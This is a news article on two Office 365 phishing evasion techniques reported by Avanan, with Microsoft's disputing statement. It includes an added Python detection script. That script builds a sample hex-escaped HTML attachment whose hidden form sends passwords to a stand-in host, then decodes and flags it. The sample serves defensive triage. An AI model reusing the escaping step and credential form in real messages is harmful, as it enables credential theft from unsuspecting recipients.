
Recent phishing attacks reportedly capitalize on Office 365 security holes

Researchers from cloud security company Avanan have reported finding two ways that phishers are evading Microsoft Office 365 security protections: one using "hexadecimal escape characters" to conceal code and links, and the other by abusing files hosted on SharePoint.

The first method involves emails carrying an HTML attachment that contains a small block of JavaScript obscured with hexadecimal escape characters, so the phishing page is built in the recipient's browser only when the attachment is opened. "Therefore, no links are visible, but when opened, it presents a locally-generated phishing page with login instructions," the company explains in an Aug. 24 blog post.

In one recent example, Avanan came across a phishing email, purportedly sent by PayPal, that displayed a fraudulent login page, asking for account information such as name, address, phone number and password. By entering the information and clicking a submit button, the recipient unknowingly transmits his or her information to the cybercriminals.

Avanan reports that these emails are good at evading detection because their malicious links are hidden inside the escaped script rather than appearing in the message body, the fake login page is produced locally rather than fetched from a blocklisted site, and sandbox technologies generally don't treat an HTML file containing a submit button as suspicious.
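To make the evasion concrete, the following is an added example (not code from Avanan, Microsoft, or SC Media) of what a mail gateway could do about it: it constructs a sample HTML attachment in the style described above, whose script holds the login form as a `\xNN`-escaped string, then decodes the escapes the way a JavaScript engine would and inspects the recovered markup for a password field and a form posting to a non-allow-listed host. The attachment, the collector host `collector.example` and the `paypal.com` allow-list are all constructed assumptions for the demonstration.

```python
"""Static triage of an HTML attachment that hides a login form in hex-escaped
JavaScript.  Added example; the sample attachment is constructed, not a real one."""
import re
from urllib.parse import urlparse

# --- constructed sample: the markup the attacker wants rendered.  The host is a
# placeholder, not a real phishing collector.
FORM_MARKUP = (
    '<form action="https://collector.example/pp/login.php" method="post">'
    'Email <input name="email"> Password <input type="password" name="pw">'
    '<input type="submit" value="Log In"></form>'
)


def hex_escape(text: str) -> str:
    """Rewrite every (ASCII) character as a JavaScript \\xNN escape: the attacker's step.
    No '<', 'http' or 'form' survives in the raw file, which is what defeats naive scanners."""
    return "".join(f"\\x{ord(ch):02x}" for ch in text)


# The attachment as it would sit in the mail: no visible link, no visible <form>.
SAMPLE_ATTACHMENT = (
    "<html><body><h2>Action required on your account</h2>\n"
    "<script>\n"
    f'var m = "{hex_escape(FORM_MARKUP)}";\n'
    "document.write(m);\n"
    "</script></body></html>"
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# A JS string literal: quote, then escaped chars or anything but that quote, then the same quote.
STRING_RE = re.compile(r"""(['"])((?:\\.|(?!\1).)*?)\1""", re.S)
JS_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")
FORM_ACTION_RE = re.compile(r"""<form\b[^>]*\baction\s*=\s*["']([^"']+)["']""", re.I)


def unescape_js(literal: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes exactly as the JS parser will at runtime."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def _is_trusted(host: str, trusted_hosts) -> bool:
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def analyze(attachment: str, trusted_hosts=("paypal.com",)) -> dict:
    """Score an HTML attachment.  trusted_hosts is an assumed allow-list of
    domains the brand in the lure would legitimately post credentials to."""
    report = {"escaped_strings": 0, "decoded_html": [], "password_field": False,
              "submit_button": False, "post_hosts": [], "verdict": "clean"}
    for script in SCRIPT_RE.findall(attachment):
        for _quote, body in STRING_RE.findall(script):
            escapes = JS_ESCAPE.findall(body)
            # Only literals that are mostly escapes are interesting; an ordinary
            # string with one '\u00e9' in it is not obfuscation.
            if not escapes or len(escapes) * 4 < 0.5 * len(body):
                continue
            report["escaped_strings"] += 1
            decoded = unescape_js(body)
            if "<" not in decoded:
                continue
            report["decoded_html"].append(decoded)
            if re.search(r"type\s*=\s*['\"]password['\"]", decoded, re.I):
                report["password_field"] = True
            if re.search(r"type\s*=\s*['\"]submit['\"]", decoded, re.I):
                report["submit_button"] = True
            for action in FORM_ACTION_RE.findall(decoded):
                host = urlparse(action).hostname or ""
                if not _is_trusted(host, trusted_hosts):
                    report["post_hosts"].append(host)
    if report["password_field"] and report["post_hosts"]:
        report["verdict"] = "phishing"
    elif report["escaped_strings"]:
        report["verdict"] = "suspicious"
    return report


if __name__ == "__main__":
    result = analyze(SAMPLE_ATTACHMENT)
    print(result["verdict"], result["post_hosts"])
```

The point of decoding rather than pattern-matching the raw file is that the indicators Avanan says the sandboxes miss (a credential form, a submit button, a link to a host the brand does not own) are all present once the literal is evaluated; a gateway that stops at the raw bytes sees only a harmless-looking string.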

According to a second Avanan blog post, the attack that abuses SharePoint generally involves an email that leverages "a genuine invoice from a commonly used online site, with a publicly open link to Office 365 SharePoint," which is a web-based, collaborative platform for Microsoft Office users. Clicking the link executes a JavaScript-based file that infects the endpoint.

Avanan claims that the phishing emails elude detection because Microsoft assumes SharePoint files are safe, as Microsoft originally developed the application. "Most people would assume that files on SharePoint and OneDrive would be scanned for malware, but the fact is that the scanning tools Microsoft uses for Office 365 are not used for files within SharePoint and OneDrive files. Even if the malware is identified once, the same file in a different location in SharePoint will not be blocked," Avanan has reported.

"We disagree with Avanan's claims," said a Microsoft spokesperson in a statement emailed to SC Media. "Microsoft's filters do not rely on the specific techniques described in the vendor post, and our solutions regularly detect and flag these kinds of attacks. In addition, we always encourage customers to use caution when clicking on links and opening emails from unknown senders."

Avanan suspects that Chinese cybercriminals may be behind the SharePoint operation, due to use of a malicious domain that was registered this week from China.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts, and video/multimedia projects, often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
